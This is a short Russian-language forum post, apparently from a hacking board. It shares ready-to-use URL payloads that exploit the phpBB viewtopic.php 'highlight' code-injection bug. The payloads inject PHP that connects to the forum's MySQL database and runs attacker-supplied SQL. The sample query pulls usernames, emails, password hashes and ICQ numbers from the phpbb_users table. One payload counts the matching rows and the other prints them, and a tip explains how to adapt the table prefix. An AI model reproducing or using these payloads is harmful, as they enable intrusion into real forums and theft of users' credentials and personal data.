Вот полазил по гуглу - баг php ещё рулит, тока вот далеко не на всех сервах можно выполнить команду system(), а мне хотелось получить не которые данные из базы. ВОт что получилось в результате: viewtopic.php?t=[topic]&highlight=%2527.mysql_connect($dbhost,$dbuser,$dbpasswd).($mvar=mysql_db_query($dbname,$_GET[sqlq])).print(mysql_num_rows($mvar)).mysql_close().%2527&sqlq=SELECT+username,user_email,user_password,user_icq+FROM+phpbb_users+WHERE+LENGTH(user_icq)%3E5+AND+LENGTH(user_icq)%3C9; этим получаем количество записей соответствующих запросу viewtopic.php?t=[topic]&highlight=%2527.mysql_connect($dbhost,$dbuser,$dbpasswd).($mvar=mysql_db_query($dbname,$_GET[sqlq])).(($llrow=mysql_fetch_array($mvar))?0:1).print(serialize($llrow).(($llrow=mysql_fetch_array($mvar))?0:1).print(serialize($llrow). {...} .$_GET[br]).mysql_close().%2527&sqlq=SELECT+username,user_email,user_password,user_icq+FROM+phpbb_users+WHERE+LENGTH(user_icq)%3E5+AND+LENGTH(user_icq)%3C9;&br=<br> это получаем данные. {...} - здесь N-ое количество (($llrow=mysql_fetch_array($mvar))?0:1).print(serialize($llrow). P.S.: в обоих запросах считается, что префих тавлиц phpbb_, если он другой, нужно его заменить.
